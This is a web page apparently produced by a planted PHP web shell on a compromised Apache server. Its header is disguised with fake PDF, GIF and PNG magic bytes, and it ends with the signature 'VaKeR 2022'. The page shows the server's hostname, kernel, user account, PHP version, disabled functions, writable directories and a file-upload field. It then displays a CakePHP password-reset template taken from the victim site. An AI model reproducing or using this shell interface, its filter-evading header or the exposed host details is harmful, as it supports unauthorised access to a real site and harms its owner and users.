%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/config/src/Template/Users/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/config/src/Template/Users/forgot.ctp
<div class="breadcrumb">
<div class="container">
<div class="row">
<div class="col-md-12">
<ul>
<li><?php echo $this->Html->link('Home', array('controller'=>'pages','action'=>'home'),array('escape' => false));?></li>
<li>Forgot</li>
</ul>
</div>
</div>
</div>
</div>

<div class="pages">
<div class="container">
<div class="row">

<div class="col-lg-offset-3 col-lg-6 col-md-offset-3 col-md-6 col-sm-12 col-xs-12">
<?php echo $this->Form->create('forgot', ['url' => ['controller' => 'users', 'action' => 'forgot'],'class'=>'user-form',]);?>
<h1>Forgot</h1>
<?php if(empty($errors) AND (!empty($this->request->getData('submit')))){ echo "<div class=validate-popup>USERNAME NOT REGISTERED WITH US</div>";}?>
<?php echo $this->Form->control('username', array('label'=>'Phone No.'));?>
<?php if(isset($errors['username']['_empty'])){ echo "<div class=validate-popup>".$errors['username']['_empty']."</div>";}?>
<?php if(isset($errors['username']['minLength'])){ echo "<div class=validate-popup>".$errors['username']['minLength']."</div>";}?>
<?php if(isset($errors['username']['maxLength'])){ echo "<div class=validate-popup>".$errors['username']['maxLength']."</div>";}?>

<?php echo $this->Form->button("submit",array('class'=>'submit','div' => false, 'name' => 'submit','value'=>'Verify'));?>
<?php echo $this->Form->end();?>
</div>

</div>
</div>
</div>
</div>


VaKeR 2022